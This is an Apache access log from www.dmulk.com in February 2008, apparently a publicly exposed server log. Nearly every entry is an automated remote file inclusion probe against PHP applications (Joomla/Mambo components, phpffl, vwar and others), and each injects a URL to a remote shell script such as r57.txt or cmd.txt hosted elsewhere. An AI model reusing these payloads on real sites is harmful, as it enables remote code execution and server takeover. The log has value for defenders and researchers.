200.206.46.247 - - [25/Feb/2008:05:02:52 -0800] "GET /logs/access_080117.log//login.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.46.247 - - [25/Feb/2008:05:03:01 -0800] "GET //login.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.46.247 - - [25/Feb/2008:05:03:11 -0800] "GET /logs//login.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.49 - - [25/Feb/2008:05:03:53 -0800] "GET /logs/access.log HTTP/1.0" 200 100339 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:03:53 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:03:53 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:03:53 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:05:03:57 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:05:03:57 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:05:03:58 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:05:04:15 -0800] "GET /logs/access_080211.log/joomla/index.php?option=com_restaurante&task=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:04:19 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:04:20 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:04:20 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:04:33 -0800] "GET /logs/access_080117.log//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:04:33 -0800] "GET /logs//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:04:34 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:04:34 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:04:34 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:04:59 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:05:02 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:05:02 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.217.6 - - [25/Feb/2008:05:05:05 -0800] "GET /logs/access_080126.log/////?mosConfig_absolute_path=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:05:05:53 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:05:05:59 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.10.90 - - [25/Feb/2008:05:06:10 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
67.15.10.90 - - [25/Feb/2008:05:06:10 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:25 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:26 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:26 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:35 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:40 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:06:41 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:07:03 -0800] "GET /logs/access_080117.log//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:07:03 -0800] "GET /logs//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:07:14 -0800] "GET /logs/access_080117.log//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:07:14 -0800] "GET /logs//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:05:07:21 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:05:07:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:05:07:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:08:01 -0800] "GET /logs/access_080117.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:05:08:01 -0800] "GET /logs/access_080117.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:05:08:09 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:05:08:09 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:24 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:24 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:50 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:53 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:08:57 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:10:51 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:05:12:45 -0800] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:05:12:45 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:05:12:45 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [25/Feb/2008:05:12:50 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.97.0.11 - - [25/Feb/2008:05:12:50 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:13:02 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:05:14:16 -0800] "GET /logs//includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:05:14:16 -0800] "GET //includes/db_connect.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:14:30 -0800] "GET //Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:14:33 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:14:51 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:14:51 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:05:15:03 -0800] "GET //includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:05:15:03 -0800] "GET /logs//includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:15:07 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:15:17 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:15:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:15:17 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:05:15:42 -0800] "GET /index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:05:15:42 -0800] "GET /logs/index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:15:47 -0800] "GET //Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:05:15:54 -0800] "GET /logs/access_080105.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:05:15:54 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:05:15:54 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:15:54 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:16:23 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:05:16:30 -0800] "GET /logs//index.php?theme=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:05:16:30 -0800] "GET //index.php?theme=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:16:30 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:05:16:35 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
80.67.21.105 - - [25/Feb/2008:05:16:36 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:05:16:49 -0800] "GET /logs/access.log//class/class.dashboard_lms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:05:18:34 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:05:18:34 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.143.84.82 - - [25/Feb/2008:05:18:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.88 - - [25/Feb/2008:05:19:52 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:05:20:01 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:20:10 -0800] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:20:11 -0800] "GET /logs/access_071230.log//components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:21:37 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:21:44 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:05:21:45 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [25/Feb/2008:05:22:00 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:22:03 -0800] "GET /logs/access_071230.log//components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:05:22:17 -0800] "GET /logs/access_071230.log//components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:23:03 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:05:23:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:23:40 -0800] "GET /logs/index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:05:23:40 -0800] "GET /index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:05:24:21 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:05:24:21 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:05:24:22 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:05:24:26 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:05:24:34 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:05:24:38 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.118.97.161 - - [25/Feb/2008:05:25:51 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [25/Feb/2008:05:25:51 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [25/Feb/2008:05:25:51 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
